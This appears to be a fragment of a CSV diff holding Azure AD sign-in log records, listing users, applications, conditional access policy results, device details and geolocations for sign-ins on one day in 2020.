Directory,231a1112-0bf5-4aba-9d7a-1056a1d22700,SigninLogs,Sucess,36.6404686,-78.26995087
+729,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:24.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c6493d22-f3d4-41bd-a6d1-023444c4220e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",47dc00a1-c484-43d0-a54f-677796be1900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,47dc00a1-c484-43d0-a54f-677796be1900,SigninLogs,Sucess,36.6404686,-78.26995087
+730,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:05.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f84a98f5-44e4-4b33-a05c-a680974e48b3,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179e388a1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,62115b57-0cb2-458e-8ba0-179e388a1a00,SigninLogs,Sucess,33.7984581,-84.38828278
+731,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:03.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0abce4fa-6943-4552-88eb-390b37429bbe,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 16:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",028ee73f-e71d-464b-b4fd-9db2cc2e1900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,028ee73f-e71d-464b-b4fd-9db2cc2e1900,SigninLogs,Sucess,33.7984581,-84.38828278
+732,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:03.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,23d82071-2998-4544-99f1-26efc8fefc8c,Microsoft.aadiam,Microsoft.aadiam,,Preeti Krishna,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 23:35,"{'operatingSystem': 'Windows 10', 'deviceId': '2b5ce400-46e8-497f-b04f-4fd16c0e0ea8', 'browser': 'Edge 18.1836', 'displayName': 'PREETIKR-SUR', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",250ee335-2b43-46f0-bae5-c14e52310200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.17095184326172, 'latitude': 47.69049072265625}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Preeti Krishna,9c124f6b-0d06-49b1-8509-ca2aab3d2038,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,250ee335-2b43-46f0-bae5-c14e52310200,SigninLogs,Sucess,47.69049072,-122.1709518
+733,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:49.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,23d82071-2998-4544-99f1-26efc8fefc8c,Microsoft.aadiam,Microsoft.aadiam,,Preeti Krishna,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 23:35,"{'operatingSystem': 'Windows 10', 'deviceId': '2b5ce400-46e8-497f-b04f-4fd16c0e0ea8', 'browser': 'Edge 18.1836', 'displayName': 'PREETIKR-SUR', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",af5715fa-7bd5-4e23-9ccf-3b38e32c0200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.17095184326172, 'latitude': 47.69049072265625}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],{'errorCode': 0},Preeti Krishna,9c124f6b-0d06-49b1-8509-ca2aab3d2038,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,af5715fa-7bd5-4e23-9ccf-3b38e32c0200,SigninLogs,Sucess,47.69049072,-122.1709518
+734,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:05.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,008c635e-a0a5-4fcf-898e-dcdec0da8d1a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 01:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",0c3d33fc-950a-42ac-8839-1b7d92e20600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0c3d33fc-950a-42ac-8839-1b7d92e20600,SigninLogs,Sucess,36.6404686,-78.26995087
+735,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:43.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a6592af5-2274-452e-87fe-30d8e806a757,Microsoft.aadiam,Microsoft.aadiam,,Anisha Mazumder,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 06:36,"{'operatingSystem': 'Windows 10', 'deviceId': '75392852-2598-4dbf-b660-72575bbb649c', 'browser': 'Chrome 80.0.3987', 'displayName': 'DESKTOP-P6BQAS3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",9e3c938b-6f3f-4540-a6b6-9cb156d11000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1082763671875, 'latitude': 47.63346099853515}, 'state': 'Washington', 'city': 'Redmond'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Anisha Mazumder,d7c6f420-22bf-444d-afe4-faa3d43ac95f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,9e3c938b-6f3f-4540-a6b6-9cb156d11000,SigninLogs,Sucess,47.633461,-122.1082764
+736,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:29.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 06:45,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",54b59d3d-5e95-40b7-b10b-432425e50b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,54b59d3d-5e95-40b7-b10b-432425e50b00,SigninLogs,Sucess,50.6406517,5.572050095
